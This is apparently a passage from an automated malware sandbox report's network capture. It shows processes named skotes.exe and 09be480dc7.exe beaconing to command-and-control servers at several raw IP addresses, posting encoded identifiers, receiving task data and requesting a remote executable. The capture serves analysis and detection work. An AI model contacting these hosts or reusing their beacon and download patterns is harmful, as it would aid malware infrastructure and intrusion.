                                                                                                                                                                                                                                                Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.607244015 CET776INData Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0
                                                                                                                                                                                                                                                Data Ascii: +y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.607261896 CET1236INData Raw: 51 8c 48 de 53 42 b3 9f 80 87 2d 00 76 d3 fc 30 3c 83 c1 20 e0 19 63 5c 90 b2 04 84 74 4d ee b0 63 ca e0 5b 54 34 e0 b0 f7 41 75 d5 78 78 63 0d a0 9e 2a 2b f7 eb a9 e9 0b 68 09 4d fb eb 1e bd b6 67 1b d2 43 5d 60 b9 3d 6f ab 38 4d 7d 6b a9 2b 07
                                                                                                                                                                                                                                                Data Ascii: QHSB-v0< c\tMc[T4Auxxc*+hMgC]`=o8M}k+B[5Nx62G(%OrKv5H0Uq`42p0;U&lV)h,t7jUHroBA#- Rvc+xuT$yQ;)D<1:XRE^7ipg/
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.607717991 CET1236INData Raw: 1c d9 36 dc 92 56 13 9a 51 8a a2 a9 0e fc 39 5f 6e 2d b9 8d e0 d2 d3 5c 6a 73 c6 14 6b 12 37 fc bf d4 72 b5 69 16 1b 78 a8 61 23 1d bc 76 79 fe dd 91 43 5c 3c bd c9 13 b3 37 77 e7 cd 06 ea 13 c0 0f 04 ec 03 ed 73 bc 35 aa 38 c2 33 99 76 c7 02 3d
                                                                                                                                                                                                                                                Data Ascii: 6VQ9_n-\jsk7rixa#vyC\<7ws583v=w,"Zf`>]6%""4Y8}p+[aM}<Q8,R\;(!y7|@s(gYK&&nB<H3Qh-`
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.615562916 CET1236INData Raw: ef 68 0f 83 0f f0 5b 39 d3 77 ad 42 87 cf 4e b4 0d bb fa 83 0c 3a ef c1 8d 12 d6 44 1e 47 2a 54 02 3b 5e 57 62 0d 49 59 7a ac 9e 07 46 c7 d1 73 3d 66 c2 12 95 81 9f d8 97 75 8e c2 f3 f1 0c 05 1d 0a 2e 94 1b f8 94 69 74 00 f7 75 20 0a a5 a0 43 7b
                                                                                                                                                                                                                                                Data Ascii: h[9wBN:DG*T;^WbIYzFs=fu.itu C{`94gkda6U#VoTT<{TIgB)v\+ \3By=~Q2}H}izsGv>sH4w3*gWM|E j;
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.616441965 CET1236INData Raw: d8 e7 cd 7a b9 3d 65 1d e3 53 4f ba c4 27 67 75 c2 8a 09 90 d7 29 ff 9b a4 c5 23 eb 3d 0f 7e 44 08 72 16 c5 97 00 82 bd 3f 5f fe 45 6b 78 d3 20 e8 97 e7 c3 79 43 ee d8 53 3c da ff e2 30 1a 6b df 7b 29 c3 d8 ce 51 74 dc dd eb 44 b2 90 75 04 b3 08
                                                                                                                                                                                                                                                Data Ascii: z=eSO'gu)#=~Dr?_Ekx yCS<0k{)QtDuuM5:1hJ5A\*3x>olqm%o85$<(+#.Rk6FUbw[bbK[FV%#33<ilf.JiN<T=


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                35192.168.2.450330185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:01.453638077 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:02.788965940 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:02 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                36192.168.2.45033780.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:02.857147932 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:04.193280935 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:03 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                37192.168.2.450343185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:04.556988955 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:05.986327887 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:05 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                38192.168.2.45035080.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:06.610882998 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:07.977484941 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:07 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                39192.168.2.450352185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:07.624614000 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:08.982914925 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                40192.168.2.45035980.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:10.360342026 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:11.703255892 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:11 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                41192.168.2.450362185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:10.734352112 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:12.079000950 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                42192.168.2.450372185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:13.752420902 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:15.114976883 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                43192.168.2.45037380.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:14.235354900 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:15.571753979 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:15 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                44192.168.2.450380185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:17.243577003 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:18.604701042 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                45192.168.2.45038180.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:18.204751015 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:19.538902044 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:19 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                46192.168.2.450383185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:20.233608961 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:21.606973886 CET297INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:21 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 36 62 0d 0a 20 3c 63 3e 31 30 31 34 37 39 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 65 37 31 39 31 34 65 35 34 61 36 31 63 66 36 34 64 34 61 34 38 35 61 39 35 39 32 65 31 30 30 62 37 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 6b <c>1014799001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e100b7#<d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                47192.168.2.45038531.41.244.11807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:21.787527084 CET144OUTGET /files/encoxx/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 31.41.244.11
                                                                                                                                                                                                                                                If-Modified-Since: Thu, 12 Dec 2024 07:55:00 GMT
                                                                                                                                                                                                                                                If-None-Match: "675a96d4-60200"
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:23.211731911 CET191INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:22 GMT
                                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675a96d4-60200"


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                48192.168.2.45038680.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:22.079123020 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:23.392060995 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:23 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                49192.168.2.45038780.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:26.761224985 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:27.911796093 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:27 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


